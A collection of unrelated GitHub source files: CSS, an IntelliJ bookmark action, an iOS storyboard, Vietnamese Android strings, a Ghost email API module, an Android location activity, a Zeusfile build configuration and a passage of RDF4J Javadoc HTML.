r.nextBytes(res); return res; } }
{ "pile_set_name": "Github" }
* { box-sizing: border-box; } body { padding: 0; margin: 0; font-family: 'Dosis', sans-serif; font-size: 18px; background-color: #eee; overflow: hidden; position: absolute; top: 0px; bottom: 0px; right: 0px; left: 0px; } h1 { margin-left: 38px; font-size: 42px; font-weight: 200; letter-spacing: 1px; } h2 { margin: 30px 0 20px 0; font-weight: 700; font-size: 22px; letter-spacing: 1px; } .column { position: absolute; top: 110px; bottom: 0px; border-left: 1px dotted #bbb; padding: 0 0 0 20px; display: none; } #example-list { position: absolute; top: 50px; left: 20px; right: 0px; bottom: 0px; font-family: Monaco, Menlo, "Ubuntu Mono", Consolas, source-code-pro, monospaceace; font-size: 12px; overflow: hidden; padding-bottom: 20px; } .example-item { padding: 4px 0 4px 0; cursor: pointer; } .example-item:hover { background-color: rgba(0, 0, 0, 0.05); } #code-editor { position: absolute; top: 50px; left: 20px; right: 0px; bottom: 0px; background: #eee; } #log-output { position: absolute; top: 50px; left: 20px; right: 0px; bottom: 0px; padding-bottom: 20px; font-family: Monaco, Menlo, "Ubuntu Mono", Consolas, source-code-pro, monospaceace; font-size: 12px; background: #eee; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } .log-entry { margin-bottom: 4px; padding-bottom: 4px; border-bottom: 1px dotted #b4b4b4; } .log-entry-details { color: #b4b4b4; margin-right: 8px; } .log-entry-info { color: black; } .log-entry-debug { color: black; } .log-entry-warn { color: #ff9100; } .log-entry-error { color: red; } #run-button { position: absolute; top: -2px; left: 24px; width: 26px; height: 26px; border-radius: 50%; z-index: 20000; cursor: pointer; background-color: #82CA6D; background-image: url("../img/run-icon.svg"); background-size: 16px 16px; background-position: center center; background-repeat: no-repeat; } #run-button:hover { background-color: #64a151; } #run-button:active { top: -1px; left: 25px; } .ace_gutter-cell { opacity: 0.3 !important; }
{ "pile_set_name": "Github" }
// Copyright 2000-2019 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file. package com.intellij.ide.bookmarks.actions; import com.intellij.icons.AllIcons; import com.intellij.ide.IdeBundle; import com.intellij.ide.bookmarks.BookmarkManager; import com.intellij.lang.LangBundle; import com.intellij.openapi.actionSystem.*; import com.intellij.openapi.editor.Editor; import com.intellij.openapi.project.DumbAware; import com.intellij.openapi.project.Project; import org.jetbrains.annotations.NotNull; public class ToggleBookmarkAction extends BookmarksAction implements DumbAware, Toggleable { public ToggleBookmarkAction() { getTemplatePresentation().setText(IdeBundle.messagePointer("action.bookmark.toggle")); } @Override public void update(@NotNull AnActionEvent event) { Project project = event.getProject(); DataContext dataContext = event.getDataContext(); event.getPresentation().setEnabled(project != null && (CommonDataKeys.EDITOR.getData(dataContext) != null || CommonDataKeys.VIRTUAL_FILE.getData(dataContext) != null)); if (ActionPlaces.TOUCHBAR_GENERAL.equals(event.getPlace())) { event.getPresentation().setIcon(AllIcons.Actions.Checked); } final BookmarkInContextInfo info = getBookmarkInfo(event); final boolean selected = info != null && info.getBookmarkAtPlace() != null; if (ActionPlaces.isPopupPlace(event.getPlace())) { event.getPresentation().setText(selected ? LangBundle.message("action.clear.bookmark.text") : LangBundle.message("action.set.bookmark.text")); } else { event.getPresentation().setText(IdeBundle.messagePointer("action.bookmark.toggle")); Toggleable.setSelected(event.getPresentation(), selected); } } @Override public void actionPerformed(@NotNull AnActionEvent e) { Project project = e.getProject(); if (project == null) return; final BookmarkInContextInfo info = getBookmarkInfo(e); if (info == null) return; final boolean selected = info.getBookmarkAtPlace() != null; Toggleable.setSelected(e.getPresentation(), selected); if (selected) { BookmarkManager.getInstance(project).removeBookmark(info.getBookmarkAtPlace()); } else { Editor editor = e.getData(CommonDataKeys.EDITOR); if (editor != null) { BookmarkManager.getInstance(project).addEditorBookmark(editor, info.getLine()); } else { BookmarkManager.getInstance(project).addTextBookmark(info.getFile(), info.getLine(), ""); } } } public static BookmarkInContextInfo getBookmarkInfo(@NotNull AnActionEvent e) { Project project = e.getProject(); if (project == null) return null; final BookmarkInContextInfo info = new BookmarkInContextInfo(e.getDataContext(), project).invoke(); return info.getFile() == null ? null : info; } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="17147" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="vXZ-lx-hvc"> <device id="retina4_7" orientation="portrait" appearance="light"/> <dependencies> <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="17120"/> <capability name="Safe area layout guides" minToolsVersion="9.0"/> <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/> </dependencies> <scenes> <!--View Controller--> <scene sceneID="ufC-wZ-h7g"> <objects> <viewController id="vXZ-lx-hvc" customClass="ViewController" customModule="PhotoKitData" customModuleProvider="target" sceneMemberID="viewController"> <view key="view" contentMode="scaleToFill" id="kh9-bI-dsS"> <rect key="frame" x="0.0" y="0.0" width="375" height="667"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <subviews> <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="qDc-VS-wqm"> <rect key="frame" x="43" y="111" width="81" height="30"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <state key="normal" title="List Albums"> <color key="titleShadowColor" red="0.5" green="0.5" blue="0.5" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </state> <connections> <action selector="doButton2:" destination="vXZ-lx-hvc" eventType="touchUpInside" id="aBc-Sv-OEf"/> </connections> </button> <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="H5O-Sx-1pW"> <rect key="frame" x="43" y="189" width="175" height="30"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <state key="normal" title="List Photos in One Album"> <color key="titleShadowColor" red="0.5" green="0.5" blue="0.5" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </state> <connections> <action selector="doButton3:" destination="vXZ-lx-hvc" eventType="touchUpInside" id="6we-T7-Seu"/> </connections> </button> <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="ejq-Gm-Jon"> <rect key="frame" x="43" y="269" width="94" height="30"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <state key="normal" title="Create Album"> <color key="titleShadowColor" red="0.5" green="0.5" blue="0.5" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </state> <connections> <action selector="doButton4:" destination="vXZ-lx-hvc" eventType="touchUpInside" id="g14-zk-G4O"/> </connections> </button> <button opaque="NO" contentMode="scaleToFill" fixedFrame="YES" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="BZb-53-U49"> <rect key="frame" x="43" y="354" width="209" height="30"/> <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/> <state key="normal" title="Add Photo to Created Album"> <color key="titleShadowColor" red="0.5" green="0.5" blue="0.5" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </state> <connections> <action selector="doButton5:" destination="vXZ-lx-hvc" eventType="touchUpInside" id="Qts-tl-bdy"/> </connections> </button> </subviews> <viewLayoutGuide key="safeArea" id="3og-4K-0g1"/> <color key="backgroundColor" red="1" green="1" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/> </view> </viewController> <placeholder placeholderIdentifier="IBFirstResponder" id="x5A-6p-PRh" sceneMemberID="firstResponder"/> </objects> <point key="canvasLocation" x="132" y="114"/> </scene> </scenes> </document>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <!--Generated by crowdin.com--> <resources> <string name="debug_toast_enabled">Soát lỗi đang bật. Hãy quay về cài đặt.</string> <string name="debug_toast_already_enabled">Đã bật soát lỗi. Hãy quay lại phần cài đặt.</string> <string name="debug_disclaimer_info">Dù hầu hết các thông tin cá nhân đều tự động bị xoá khỏi báo cáo, một số thông tin nhạy cảm có thể vẫn xuất hiện. \nHãy xem lại báo cáo lỗi trước khi gửi đi. \n\nBấm một trong các tuỳ chọn dưới đây để soạn email chứa dữ liệu trang web. </string> <string name="debug_incomplete">Báo cáo không đầy đủ</string> <string name="debug_web">Dò lỗi từ web</string> <string name="debug_web_desc">Chuyển đến trang bị lỗi và gửi thông tin đề dò lỗi.</string> <string name="parsing_data">Phân tích dữ liệu</string> <string name="debug_parsers">Phân tích lỗi</string> <string name="debug_parsers_desc">Mở một trong các bộ phân tích lỗi để dò lỗi từ kết quả phân tích</string> </resources>
{ "pile_set_name": "Github" }
const models = require('../../models'); const {i18n} = require('../../lib/common'); const errors = require('@tryghost/errors'); const megaService = require('../../services/mega'); module.exports = { docName: 'emails', read: { options: [ 'fields' ], validation: { options: { fields: ['html', 'plaintext', 'subject'] } }, data: [ 'id' ], permissions: true, query(frame) { return models.Email.findOne(frame.data, frame.options) .then((model) => { if (!model) { throw new errors.NotFoundError({ message: i18n.t('errors.models.email.emailNotFound') }); } return model; }); } }, retry: { data: [ 'id' ], permissions: true, query(frame) { return models.Email.findOne(frame.data, frame.options) .then(async (model) => { if (!model) { throw new errors.NotFoundError({ message: i18n.t('errors.models.email.emailNotFound') }); } if (model.get('status') !== 'failed') { throw new errors.IncorrectUsageError({ message: i18n.t('errors.models.email.retryNotAllowed') }); } return await megaService.mega.retryFailedEmail(model); }); } } };
{ "pile_set_name": "Github" }
package org.zarroboogs.weibo.activity; //import com.google.android.gms.maps.CameraUpdate; //import com.google.android.gms.maps.CameraUpdateFactory; //import com.google.android.gms.maps.GoogleMap; //import com.google.android.gms.maps.SupportMapFragment; //import com.google.android.gms.maps.model.LatLng; //import com.google.android.gms.maps.model.Marker; //import com.google.android.gms.maps.model.MarkerOptions; import org.zarroboogs.util.net.WeiboException; import org.zarroboogs.weibo.BeeboApplication; import org.zarroboogs.weibo.R; import org.zarroboogs.weibo.asynctask.MyAsyncTask; import org.zarroboogs.weibo.bean.GeoBean; import org.zarroboogs.weibo.bean.MessageBean; import org.zarroboogs.weibo.bean.data.NearbyStatusListBean; import org.zarroboogs.weibo.dao.NearbyTimeLineDao; import org.zarroboogs.weibo.support.utils.Utility; import android.content.Context; import android.location.Address; import android.location.Geocoder; import android.location.Location; import android.location.LocationListener; import android.location.LocationManager; import android.os.Bundle; import android.text.TextUtils; import android.view.LayoutInflater; import android.view.Menu; import android.view.MenuItem; import android.widget.ProgressBar; import android.widget.Toast; import java.io.IOException; import java.util.HashMap; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.Set; public class NearbyTimeLineActivity extends AbstractAppActivity { // private GoogleMap mMap; private double lat; private double lon; private String locationStr; // private Marker melbourne; // private Map<Marker, MessageBean> bindEvent = new HashMap<Marker, // MessageBean>(); private GetGoogleLocationInfo locationTask; private FetchWeiboMsg fetchWeiboMsg; private MenuItem refresh; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.map); // getActionBar().setDisplayShowHomeEnabled(false); // getActionBar().setDisplayShowTitleEnabled(true); // getActionBar().setDisplayHomeAsUpEnabled(false); // getActionBar().setTitle(getString(R.string.nearby)); addLocation(); } @Override protected void onResume() { super.onResume(); if (TextUtils.isEmpty(locationStr)) { if (Utility.isTaskStopped(locationTask)) { GeoBean geoBean = new GeoBean(); geoBean.setLatitude(lat); geoBean.setLongitude(lon); locationTask = new GetGoogleLocationInfo(geoBean); locationTask.executeOnExecutor(MyAsyncTask.THREAD_POOL_EXECUTOR); } } } @Override protected void onPause() { super.onPause(); Utility.cancelTasks(locationTask); } private void setUpMapIfNeeded() { // if (mMap == null) { // mMap = ((SupportMapFragment) // getSupportFragmentManager().findFragmentById(R.id.map)) // .getMap(); // if (mMap != null) { // mMap.setMapType(GoogleMap.MAP_TYPE_NORMAL); // // mMap.setOnInfoWindowClickListener(new // GoogleMap.OnInfoWindowClickListener() { // public void onInfoWindowClick(Marker marker) { // MessageBean msg = bindEvent.get(marker); // if (msg != null) { // startActivityForResult(BrowserWeiboMsgActivity.newIntent(msg, // GlobalContext.getInstance().getSpecialToken()), 0); // } // } // }); // // final LatLng MELBOURNE = new LatLng(lat, lon); // melbourne = mMap.addMarker(new MarkerOptions() // .position(MELBOURNE) // .title(GlobalContext.getInstance().getCurrentAccountName()) // .snippet(String.format("[%f,%f]", lat, lon) // )); // melbourne.showInfoWindow(); // LatLng latLng = new LatLng(lat, lon); // CameraUpdate update = CameraUpdateFactory.newLatLng(latLng); // mMap.moveCamera(update); // // } // } } @Override public boolean onCreateOptionsMenu(Menu menu) { getMenuInflater().inflate(R.menu.actionbar_menu_nearbytimelineactivity, menu); refresh = menu.findItem(R.id.refresh); return super.onCreateOptionsMenu(menu); } @Override public boolean onOptionsItemSelected(MenuItem item) { int itemId = item.getItemId(); if (itemId == R.id.refresh) { } return super.onOptionsItemSelected(item); } private class GetGoogleLocationInfo extends MyAsyncTask<Void, String, String> { GeoBean geoBean; public GetGoogleLocationInfo(GeoBean geoBean) { this.geoBean = geoBean; } @Override protected String doInBackground(Void... params) { Geocoder geocoder = new Geocoder(NearbyTimeLineActivity.this, Locale.getDefault()); List<Address> addresses = null; try { addresses = geocoder.getFromLocation(geoBean.getLat(), geoBean.getLon(), 1); } catch (IOException e) { cancel(true); } if (addresses != null && addresses.size() > 0) { Address address = addresses.get(0); StringBuilder builder = new StringBuilder(); int size = address.getMaxAddressLineIndex(); for (int i = 0; i < size; i++) { builder.append(address.getAddressLine(i)); } return builder.toString(); } return ""; } @Override protected void onPostExecute(String s) { // if (!TextUtils.isEmpty(s) && melbourne != null) { // melbourne.showInfoWindow(); // getActionBar().setSubtitle(s); // } super.onPostExecute(s); } } private void addLocation() { LocationManager locationManager = (LocationManager) NearbyTimeLineActivity.this .getSystemService(Context.LOCATION_SERVICE); if (!locationManager.isProviderEnabled(LocationManager.GPS_PROVIDER) && !locationManager.isProviderEnabled(LocationManager.NETWORK_PROVIDER)) { Toast.makeText(NearbyTimeLineActivity.this, getString(R.string.please_open_gps), Toast.LENGTH_SHORT).show(); return; } Toast.makeText(NearbyTimeLineActivity.this, getString(R.string.gps_is_searching), Toast.LENGTH_SHORT).show(); if (locationManager.isProviderEnabled(LocationManager.NETWORK_PROVIDER)) { locationManager.requestLocationUpdates(LocationManager.NETWORK_PROVIDER, 1000, 0, locationListener); } if (locationManager.isProviderEnabled(LocationManager.GPS_PROVIDER)) { locationManager.requestLocationUpdates(LocationManager.GPS_PROVIDER, 1000, 0, locationListener); } } private void updateWithNewLocation(Location result) { GeoBean geoBean = new GeoBean(); lat = result.getLatitude(); lon = result.getLongitude(); setUpMapIfNeeded(); geoBean.setLatitude(lat); geoBean.setLongitude(lon); if (Utility.isTaskStopped(locationTask)) { locationTask = new GetGoogleLocationInfo(geoBean); locationTask.executeOnExecutor(MyAsyncTask.THREAD_POOL_EXECUTOR); } if (Utility.isTaskStopped(fetchWeiboMsg)) { fetchWeiboMsg = new FetchWeiboMsg(); fetchWeiboMsg.executeOnExecutor(MyAsyncTask.THREAD_POOL_EXECUTOR); } ((LocationManager) NearbyTimeLineActivity.this.getSystemService(Context.LOCATION_SERVICE)) .removeUpdates(locationListener); } private final LocationListener locationListener = new LocationListener() { public void onLocationChanged(Location location) { updateWithNewLocation(location); } public void onProviderDisabled(String provider) { } public void onProviderEnabled(String provider) { } public void onStatusChanged(String provider, int status, Bundle extras) { } }; private class FetchWeiboMsg extends MyAsyncTask<Void, Void, NearbyStatusListBean> { @Override protected void onPreExecute() { super.onPreExecute(); LayoutInflater inflater = (LayoutInflater) getSystemService(Context.LAYOUT_INFLATER_SERVICE); ProgressBar pb = (ProgressBar) inflater.inflate(R.layout.editmyprofileactivity_refresh_actionbar_view_layout, null); refresh.setActionView(pb); } @Override protected NearbyStatusListBean doInBackground(Void... params) { try { return new NearbyTimeLineDao(BeeboApplication.getInstance().getAccessToken(), lat, lon).get(); } catch (WeiboException e) { e.printStackTrace(); } return null; } @Override protected void onPostExecute(NearbyStatusListBean nearbyStatusListBean) { super.onPostExecute(nearbyStatusListBean); if (refresh.getActionView() != null) { refresh.getActionView().clearAnimation(); refresh.setActionView(null); } if (nearbyStatusListBean == null) { return; } List<MessageBean> messageBeanList = nearbyStatusListBean.getItemList(); for (MessageBean msg : messageBeanList) { GeoBean g = msg.getGeo(); if (g == null) { continue; } // final LatLng MELBOURNE = new LatLng(g.getLat(), g.getLon()); // Marker melbourne = mMap.addMarker(new MarkerOptions() // .position(MELBOURNE) // .title(msg.getUser().getScreen_name()) // .snippet(msg.getText()) // ); // melbourne.showInfoWindow(); // bindEvent.put(melbourne, msg); } } } }
{ "pile_set_name": "Github" }
# ________ ____ __ __ ______ # \___ // __ \| | \/ ___/ # / /\ ___/| | /\___ \ # /_____ \\___ >____//____ > # \/ \/ \/ # Build System # v0.8.1 # # default interpreter used for Zeusfile code is bash # that means all commands without the language field are treated as shell scripts # to change the default script language, use the language field # to change the language of an individual command, use the language field directly on the command language: bash # globals are visible for all commands # they can contain variables # for language specific code create a globals.[scriptExtension] file in the zeus directory globals: binaryName: zeus buildDir: bin version: 0.8 # all commands # available fields: # Field # Type # Info # ------------------------- # -------------- # -------------------------------------------------------------- # description # string # a short description text that will be display on startup # help # string # a multi line manual entry for detailed explanations # dependencies # []string # a list of dependency commands with their arguments # outputs # []string # a list of ouputs files / directories # buildNumber # bool # increment buildNumber each execution # arguments # []string # list of typed arguments, allows optionals and default values # async # bool # detach comamnd async in a screen session, attach on demand # path # string # custom path for script file # exec # string # supply the script directly without a file commands: # multi language examples # python: description: a python script language: python arguments: - src:String - dst:String exec: | python_greet() print("src=" + src) print("dst=" + dst) ruby: description: a ruby script language: ruby arguments: - src:String - dst:String exec: | puts "hello from ruby!" puts "source=" + $src puts "destination=" + $dst lua: description: a lua script language: lua arguments: - src:String - dst:String exec: | print("Hello World! from lua!") print("source=", src) print("destination=", dst) javascript: description: a javascript program language: javascript arguments: - src:String - dst:String exec: | console.log("[ZEUS v" + version + "] Hello World!"); console.log("source=" + src); console.log("destination=" + dst); # examples # cycle1: description: produce a cycle dependencies: - cycle2 outputs: exec: echo "cycle1 called!" cycle2: description: produce a cycle dependencies: - cycle1 exec: echo "cycle2 called!" arguments: description: test optional command arguments help: | this is an example for the optional commands argument imagine a remote login scenario arguments: - user:String? = bob - password:String - ipAddr:String - port:Int? = 80 dependencies: outputs: exec: | print("test-optionals:") print("user=" + user) print("password=" + password) print("ipAddr=" + ipAddr) print("port=" + port) buildNumber: description: increase build number each execution buildNumber: true exec: echo "increasing buildNumber" chain: description: test chained commands dependencies: - dependency2 - async - arguments password=test ipAddr=192.168.1.5 exec: echo "testing chained commands" async: description: test asyncronous command execution help: | this is an example for the asyncronous command execution outputs: async: true exec: | sleep 3 && echo "ping" && sleep 3 && echo "ping" sleep 3 && echo "ping" && sleep 3 && echo "ping" sleep 3 && echo "ping" && sleep 3 && echo "ping" sleep 3 && echo "ping" && sleep 3 && echo "ping" dependency1: description: test dependencies help: | this is an example for the dependencies outputs: - tests/bin/dependency1 buildNumber: true exec: | touch tests/bin/dependency1 dependency2: description: test dependencies help: | this is an example for the dependencies dependencies: - dependency1 buildNumber: true exec: | touch tests/bin/dependency2 all: description: description for command all help: help text for command all arguments: dependencies: - clean - configure outputs: clean: description: description for command clean help: help text for command clean arguments: dependencies: outputs: build: description: description for command build help: help text for command build arguments: dependencies: outputs: configure: description: description for command configure help: help text for command configure arguments: dependencies: outputs:
{ "pile_set_name": "Github" }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_222) on Wed Aug 14 11:24:36 AEST 2019 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>LogConfigurator.LogReaderAction (RDF4J 2.5.4 API)</title> <meta name="date" content="2019-08-14"> <link rel="stylesheet" type="text/css" href="../../../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="LogConfigurator.LogReaderAction (RDF4J 2.5.4 API)"; } } catch(err) { } //--> var methods = {"i0":10,"i1":10}; var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/LogConfigurator.LogReaderAction.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.html" title="class in org.eclipse.rdf4j.common.app.logging.logback"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li>Next&nbsp;Class</li> </ul> <ul class="navList"> <li><a href="../../../../../../../index.html?org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html" target="_top">Frames</a></li> <li><a href="LogConfigurator.LogReaderAction.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#fields.inherited.from.class.ch.qos.logback.core.joran.action.Action">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.eclipse.rdf4j.common.app.logging.logback</div> <h2 title="Class LogConfigurator.LogReaderAction" class="title">Class LogConfigurator.LogReaderAction</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li><a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">java.lang.Object</a></li> <li> <ul class="inheritance"> <li>ch.qos.logback.core.spi.ContextAwareBase</li> <li> <ul class="inheritance"> <li>ch.qos.logback.core.joran.action.Action</li> <li> <ul class="inheritance"> <li>org.eclipse.rdf4j.common.app.logging.logback.LogConfigurator.LogReaderAction</li> </ul> </li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Implemented Interfaces:</dt> <dd>ch.qos.logback.core.spi.ContextAware</dd> </dl> <dl> <dt>Enclosing class:</dt> <dd><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.html" title="class in org.eclipse.rdf4j.common.app.logging.logback">LogConfigurator</a></dd> </dl> <hr> <br> <pre>public class <span class="typeNameLabel">LogConfigurator.LogReaderAction</span> extends ch.qos.logback.core.joran.action.Action</pre> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field.summary"> <!-- --> </a> <h3>Field Summary</h3> <ul class="blockList"> <li class="blockList"><a name="fields.inherited.from.class.ch.qos.logback.core.joran.action.Action"> <!-- --> </a> <h3>Fields inherited from class&nbsp;ch.qos.logback.core.joran.action.Action</h3> <code>ACTION_CLASS_ATTRIBUTE, CLASS_ATTRIBUTE, FILE_ATTRIBUTE, KEY_ATTRIBUTE, NAME_ATTRIBUTE, PATTERN_ATTRIBUTE, SCOPE_ATTRIBUTE, VALUE_ATTRIBUTE</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="fields.inherited.from.class.ch.qos.logback.core.spi.ContextAwareBase"> <!-- --> </a> <h3>Fields inherited from class&nbsp;ch.qos.logback.core.spi.ContextAwareBase</h3> <code>context</code></li> </ul> </li> </ul> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html#LogReaderAction--">LogReaderAction</a></span>()</code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html#begin-ch.qos.logback.core.joran.spi.InterpretationContext-java.lang.String-org.xml.sax.Attributes-">begin</a></span>(ch.qos.logback.core.joran.spi.InterpretationContext&nbsp;ec, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;name, <a href="http://download.oracle.com/javase/7/docs/api/org/xml/sax/Attributes.html?is-external=true" title="class or interface in org.xml.sax">Attributes</a>&nbsp;attributes)</code>&nbsp;</td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../../../../org/eclipse/rdf4j/common/app/logging/logback/LogConfigurator.LogReaderAction.html#end-ch.qos.logback.core.joran.spi.InterpretationContext-java.lang.String-">end</a></span>(ch.qos.logback.core.joran.spi.InterpretationContext&nbsp;ec, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;arg1)</code>&nbsp;</td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.ch.qos.logback.core.joran.action.Action"> <!-- --> </a> <h3>Methods inherited from class&nbsp;ch.qos.logback.core.joran.action.Action</h3> <code>body, getColumnNumber, getLineColStr, getLineNumber, toString</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.ch.qos.logback.core.spi.ContextAwareBase"> <!-- --> </a> <h3>Methods inherited from class&nbsp;ch.qos.logback.core.spi.ContextAwareBase</h3> <code>addError, addError, addInfo, addInfo, addStatus, addWarn, addWarn, getContext, getDeclaredOrigin, getStatusManager, setContext</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.<a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true" title="class or interface in java.lang">Object</a></h3> <code><a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#clone--" title="class or interface in java.lang">clone</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#equals-java.lang.Object-" title="class or interface in java.lang">equals</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#finalize--" title="class or interface in java.lang">finalize</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#getClass--" title="class or interface in java.lang">getClass</a>, <a href="http://download.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true#hashCode--" title="class or interface in java.lang">hashCode</a>, <a 